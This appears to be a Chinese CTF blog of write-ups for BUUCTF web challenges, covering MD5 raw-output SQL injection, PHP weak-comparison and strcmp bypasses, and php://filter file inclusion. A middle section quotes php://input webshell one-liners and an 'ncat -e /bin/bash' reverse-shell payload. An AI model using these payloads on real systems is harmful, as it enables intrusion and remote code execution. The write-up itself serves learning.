2021年5月

[BJDCTF2020]Easy MD5

这题打开啥都没发现,随便提交点东西,在head里面看到select * from 'admin' where password=md5($pass,true)

md5(string,raw)

1.string 必需。规定要计算的字符串。

2.raw 可选。规定十六进制或二进制输出格式:

TRUE - 原始 16 字符二进制格式

FALSE - 默认。32 字符十六进制数

没接触过这东西,想不通这里要怎么绕过,果断看wp

https://imagin.vip/?p=166#Easy_md5

他这里是传入一个字符串,这个字符串被md5处理成十六进制格式后跟password进行比较,因为mysql会把hex格式当成ascii格式,那我们要构造一个被处理后字符串里面含有' or '1的字符串,这里的答案是ffifdyop,他被md5加密过之后变成276f722736c95d99e921722cf9ed621c,而这个被当成16进制进行解码的话会变成'or'6�]��!r,��b,这里6xxxxx,其布尔值为1,换成别的以数字开头的字符串都行

进去之后查看源代码

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){

这个就比较经典了,字符串不同,加密后的md5弱类型比较相同,网上一找找一堆,我 这用了byGcY,sonZ7y,或者用数组绕过也行,进去看到

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

变成全等于那就只能用数组解决了,数组的md5哈希为NULL,param1[]=1¶m2[]=2,嗯,这回post又没反应了,用老办法加点料之后成功上传参数拿到flag

[极客大挑战 2019]BuyFlag

在pay那页的源代码里面看到了这段玩意

<!--
    ~~~post money and password~~~
if (isset($_POST['password'])) {
    $password = $_POST['password'];
    if (is_numeric($password)) {
        echo "password can't be number</br>";
    }elseif ($password == 404) {
        echo "Password Right!</br>";
    }
}
-->

看来我们需要传两个变量,一个是password值为404,money应该就是100000000,这里要求password既等于404又不为数字,利用php弱等于的性质就能解决,另外他要求用户是CUIT,我一开始傻乎乎的直接把user参数改成了这个,后来才发现只要改成1就行。当我想把password和money参数传进去的时候问题出现了,不管我怎么试,对面好像只接收到了本来就存在的user参数,对我后来传进去的几个参数置之不理.....找了一下解决方法,我的办法是吧数据包的GET改成POST,在repeter里面可以对数据包进行各种修改,另外我又加了一行Content-Type: application/x-www-form-urlencoded,再次传参的时候就成功了,这时提醒我Nember lenth is too long,看来对方在money这个参数上面进行了长度的限制,这里有两种办法,一种是科学计数法1e9,另外一种是利用strcmp函数特性把money后面加一个[]进行绕过,两种方法皆可

strcmp当对象是一个数组或者object的时候,因为无法比较,会直接返回0(相等),即可绕过

avatar

嗯,这题对我的难点在于怎么让对方理我的POST参数...

[ACTF2020 新生赛]BackupFile这题,虽然不是什么难题,但是有个有意思的知识点,在获取到他的源代码之后,我们可以看到

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

可以看到这里传入一个参数key,先进行一个是否为数字或数字字符串类型的判断,如果过了,取这个数的整数值,再与str进行判断,这里要用到一个php弱类型的知识点

PHP里面有两种比较符号,==和===,===在进行比较的时候,要求类型和值都相等才为真,也就是全等于,而==在进行比较的时候,如果两者类型不同,则会先把两个字符串转化为同一类型,然后再进行比较,如1xsafa会被转化为1,xsafa会被转化为0,0e54548777等等类似以0e开头的字符串都会被识别为科学计数法的数字,所以无论多少都一样

同理也可以用来绕过is_number

这题最后在被比较的时候key已经被处理成数字了,而==又会使str被转化为123,所以只要传入key=123就行

做文件包含题的时候多次用到了php://filter/convert.base64-encode/resource,稍微深入的去了解一下

php://的作用是访问各个输入/输出流,他可以支持几种不同的协议

https://www.php.net/manual/zh/wrappers.php.php

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用

参数如下
avatar

这玩意一般会给(坏蛋)拿来读取文件的源代码,上面提到的php://filter/convert.base64-encode/resource,和php://filter/read=convert.base64-encode/recource相同,意思是用base64编码的方式来读取文

https://blog.csdn.net/destiny1507/article/details/82347371

这篇博客讲到了另外几种利用方式,一种是利用上面编码解码,将马用base64加密,然后用这玩意解码出来,我们的可以被解析,而安全机制另外添加在上面的数据被解码后也就会失效

将都讲了顺带讲点别的

php://input可以访问请求原始数据的只读流,也就是说,这玩意可以读取没有处理过的post数据,https://blog.csdn.net/weixin_30326515/article/details/96024055,这篇文章讲了如何利用这玩意来getshell

<?php @eval(file_get_contents('php://input'))?>

然后提交post:system('ncat -e /bin/bash localhost 1234');

之后再用nc反弹shell


第二种
<?php @include($_GET["file"])?>

提交post:<?php system('ifconfig');?>,这样就变成代码执行漏洞

但是我估计这篇文章是复制粘贴来的,图片都挂了.....

另外其他几种PHP支持的协议和封装协议

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

[ACTF2020 新生赛]Include

点进去看到一个tips,点一下到了一个http://2d93c2fb-e3f6-48a6-a2fc-11a802bb5738.node3.buuoj.cn/?file=flag.php,他让我找flag在哪,用?file=php://filter/convert.base64-encode/resource=flag.php读出网页源代码,是一串base64加密过的字符串,解密得到flag

[极客大挑战 2019]Secret File

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html

用bp抓包看到secr3t.php这个文件,他说flag在flag.php里面,但是访问过后发现没有,考虑是不是也放在了源代码里面,和上面一样用http://5aaa80b0-8027-4e59-9b4b-3edce674d666.node3.buuoj.cn/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php读出源码,得到一段base64加密的字符串,解密得到flag